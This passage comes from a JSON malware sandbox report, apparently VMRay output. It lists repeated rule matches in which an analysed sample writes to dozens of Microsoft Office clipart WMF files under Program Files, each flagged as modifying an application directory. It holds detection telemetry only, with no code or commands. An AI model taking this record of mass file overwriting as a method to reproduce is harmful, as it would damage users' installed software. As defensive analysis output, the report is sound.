"category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40624", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02126_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02127_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02127_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40633", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02127_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02262_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02262_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40640", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02262_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02264_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02264_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40647", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02264_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02356_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02356_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40654", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02356_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02361_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02361_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40661", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02361_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02368_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02368_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40668", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02368_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02371_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02371_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40675", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02371_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02373_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02373_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40682", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02373_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02384_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02384_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40689", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02384_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02386_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02386_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40696", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02386_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02388_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02388_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40703", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02388_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02389_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02389_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40710", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02389_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02390_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02390_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40717", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02390_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02398_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40724", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02398_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02400_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40731", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02400_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02404_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40738", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02404_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02405_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40745", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02405_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02407_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40754", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02407_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02413_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40761", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02413_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02417_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02417_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40768", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02417_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02423_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02423_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40775", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02423_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02424_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40782", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02424_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02426_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40789", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02426_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02431_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40796", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02431_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02435_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02435_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40803", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02435_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02439_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02439_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40810", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02439_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02441_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02441_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40817", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02441_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02443_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02443_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40824", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02443_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02444_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02444_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40831", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02444_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02446_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02446_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02446_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02448_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02448_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40845", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02448_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02450_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40852", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na02450_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { 